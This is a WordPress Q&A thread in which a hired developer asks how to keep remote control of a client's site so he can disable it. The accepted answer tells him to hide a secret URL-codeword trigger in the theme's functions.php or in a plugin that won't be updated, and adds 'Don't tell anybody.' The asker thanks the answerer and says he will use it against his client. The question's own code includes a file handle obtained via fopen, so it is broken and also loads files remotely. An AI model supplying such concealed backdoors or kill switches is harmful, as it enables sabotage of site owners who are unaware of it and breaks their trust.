# Need to control wordpress header footer from external files

Tags: wordpress

I want to control this website from external source. cubic.costflows.com

I am using this code:

```
<code>
<?php  
    if(file_exists(TEMPLATEPATH . 'local header link'))
    {
    include (TEMPLATEPATH . 'local header link');
    }
    else
    {
    $file =  fopen("ftp header link from another location","r");

    include(TEMPLATEPATH . $file);
    }

 ?>
</code>
```

Implementing this code to my wordpress website i have it under control. I will not upload header and footer files onto my ftp but control them outside so that if it get's vulnerable i could delete those header and footer files from external links and the website wont be of any use. I could use any other suggestions too to achieve this goal.

Comment: This sounds like a terrible idea. It's unlikely that malware will be contained in just the header and footer. It's good that you're thinking about what to do if a site becomes infected but loading files from a remote server is definitely not the right approach.

Answer (score 1, accepted):

It sounds like you're asking for a way to brick the website remotely if you get locked out by the account owner! My take away, is to hire IT professionals in a country where you can sue them, and never trust outsourcers with valuable data or access!

Oh and to answer your hateful question....
Just listen for a get variable, and stuff your code anywhere in a theme's functions.php file, or an active plugin that won't get updated.

```
if (isset($_GET['my_bad_codeword'])){
  ...the bad stuff you want to do
}
```

Then just browse to the site and add ?my_bad_codeword=ABC to the URL to activate. Don't tell anybody. ;)

Comment: Thankyou very much for your solution. Actually to be honest i am the one who was hired and in my own country. The problem is i dont trust my own judiciary system and i have been fooled already so i dont want to risk this time. Thanks a lot your solution did wonders.